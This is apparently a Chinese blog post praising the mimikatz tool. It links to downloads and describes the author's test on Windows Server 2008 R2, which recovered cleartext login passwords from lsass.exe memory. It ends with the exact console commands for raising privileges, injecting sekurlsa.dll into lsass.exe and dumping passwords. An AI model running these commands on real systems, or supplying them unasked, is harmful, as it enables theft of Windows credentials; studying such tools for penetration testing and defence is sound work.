windows神器 - mimikatz


法国佬写的神器叫 mimikatz

神器下载地址: 

http://blog.gentilkiwi.com/mimikatz

还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章。

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

自己尝试了下用 win2008 r2 x64 来测试:

1.jpg - 大小: 122.23 KB - 尺寸:  x  - 点击打开新窗口浏览全图

最后测试成功 wdigest 就是我的明文密码,我还测过密码复杂度在14位以上,包含数字、大小写字母、特殊字符的密码,一样能抓出明文密码来。

以前用 wce.exe 或 lslsass.exe 通常是只能从内存里顶多抓出active账号的 lm hash 和 ntlm hash

但用了这个神器抓出明文密码后,由此我们可以反推断 在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash而已,应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的)

这样这个加密算法是可逆的 能被解密出明文,所以进程注入 lsass.exe 时 所调用的 sekurlsa.dll 应该包含了对应的解密算法。逆向功底比较好的童鞋可以尝试去逆向分析一下。

然后这个神器的功能肯定不仅仅如此,在我看来它更像一个轻量级调试器,可以提升进程权限 注入进程 读取进程内存等等。

下面展示一个 读取扫雷游戏的内存的例子:

2.jpg - 大小: 53.52 KB - 尺寸:  x  - 点击打开新窗口浏览全图

我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了

3.jpg - 大小: 55.25 KB - 尺寸:  x  - 点击打开新窗口浏览全图

总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~

记录一个最常用的用法。抓明文密码。再也不怕2008了。。哈哈

1mimikatz # privilege::debug
2mimikatz # inject::process lsass.exe sekurlsa.dll
3mimikatz # @getLogonPasswords

使用方法:
1. 运行主程序:mimikatz.exe
2. 输入:privilege::debug      提升权限
3. 输入:inject::process lsass.exe sekurlsa.dll   
     将sekurlsa.dll  注入到lsass.exe 中
4. 输入:@getLogonPasswords
   即可获取hash和当前用户的明文密码!
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值